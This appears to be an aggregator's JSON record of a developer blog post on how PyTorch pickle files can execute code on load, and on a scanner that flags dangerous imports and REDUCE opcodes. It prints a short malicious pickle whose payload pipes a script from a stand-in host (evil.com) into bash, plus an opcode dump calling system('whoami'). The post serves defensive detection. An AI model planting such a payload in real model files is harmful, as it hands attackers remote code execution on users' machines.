{"slug": "your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner", "title": "Your PyTorch Model File Can Execute Arbitrary Code — Here's How I Built a Scanner to Detect It", "summary": "PyTorch's `torch.load()` function uses the Python pickle format for serialization, which inherently executes arbitrary code when loading a file, making it trivially exploitable for remote code execution (RCE) attacks. The author built a scanner called Model-Supply-Chain-Auditor that disassembles pickle bytecode using Python's `pickletools` module to detect malicious patterns like dangerous imports (e.g., `os.system`) and REDUCE opcodes, without executing the file. The article emphasizes that while detection is reactive, the proactive defense is cryptographic model signing, and warns that every `.pt` file from untrusted sources is a potential attack vector.", "body_md": "Every time you run torch.load(\"model.pt\"), you're executing arbitrary Python code. Not \"could theoretically execute\" — actually executing. The pickle format that\nPyTorch uses for serialization has a built-in code execution mechanism, and it's trivial to exploit.\nI built a tool to detect this. Here's what I learned.\nThe Attack: 4 Lines of Code\nimport pickle, os\nclass Backdoor:\ndef reduce(self):\nreturn (os.system, (\"curl http://evil.com/shell.sh | bash\",))\npayload = pickle.dumps(Backdoor())\nThat's it. When someone loads this pickle — whether it's disguised as a model checkpoint, a dataset, or a config file — the command executes. No warnings. No prompts.\nFull RCE.\nThe reduce method tells pickle how to reconstruct an object. But \"reconstruct\" means \"call this function with these arguments.\" Any function. Any arguments.\n** Why This Matters for ML**\nML models are distributed as serialized files:\nIn 2023, HuggingFace found malicious pickles in uploaded models. This isn't theoretical — it's happening.\nHow Detection Works: Opcode Disassembly\nPython's pickletools module can disassemble pickle bytecode without executing it. Here's what a malicious pickle looks like at the opcode level:\nPROTO 4\nFRAME 25\nSHORT_BINUNICODE 'nt' ← module name (os on Windows)\nSHORT_BINUNICODE 'system' ← function name\nSTACK_GLOBAL ← load nt.system as callable\nSHORT_BINUNICODE 'whoami' ← argument\nTUPLE1 ← pack into tuple\nREDUCE ← CALL the function\nSTOP\nThe key insight: STACK_GLOBAL loads a callable by module + name, and REDUCE executes it. If the module is os, subprocess, socket, or builtins — it's malicious.\nMy Scanner:\nI built Model-Supply-Chain-Auditor (https://github.com/poojakira/Model-Supply-Chain-Auditor) to parse these opcodes and flag dangerous patterns:\nfrom src.scanners import scan_pickle_bytes\nresult = scan_pickle_bytes(suspicious_data)\nprint(result.risk_level) # \"malicious\"\nprint(result.findings) # [\"DANGEROUS import: nt.system\", \"Code execution via REDUCE\"]\nIt handles pickle protocols 0-5, including the protocol 4+ STACK_GLOBAL pattern where module and name are pushed to the stack separately.\nWhat I Got Wrong Initially\nOn Windows, os.system pickles as nt.system. On Linux, it's posix.system. My first version only checked for os — missed both platform-specific variants. Lesson: always\ntest on actual bytecode output, not what you think it should be.\nThe Defense: Model Signing\nDetection is reactive. The proactive defense is cryptographic signing:\nIf the signature doesn't match, don't load it.\nWhat This Doesn't Solve\nThe Takeaway:\nIf you're downloading model files from the internet:\nThe ML community is slowly moving toward safer serialization. Until then, every .pt file is a potential attack vector.\nCode: github.com/poojakira/Model-Supply-Chain-Auditor (https://github.com/poojakira/Model-Supply-Chain-Auditor)", "url": "https://wpnews.pro/news/your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner", "canonical_source": "https://dev.to/pooja_kiran_e3e03bf9ffeed/your-pytorch-model-file-can-execute-arbitrary-code-heres-how-i-built-a-scanner-to-detect-it-5cec", "published_at": "2026-05-19 03:02:18+00:00", "updated_at": "2026-05-19 03:33:06.172065+00:00", "lang": "en", "topics": ["cybersecurity", "machine-learning", "artificial-intelligence", "open-source", "developer-tools"], "entities": ["PyTorch", "HuggingFace"], "alternates": {"html": "https://wpnews.pro/news/your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner", "markdown": "https://wpnews.pro/news/your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner.md", "text": "https://wpnews.pro/news/your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner.txt", "jsonld": "https://wpnews.pro/news/your-pytorch-model-file-can-execute-arbitrary-code-here-s-how-i-built-a-scanner.jsonld"}}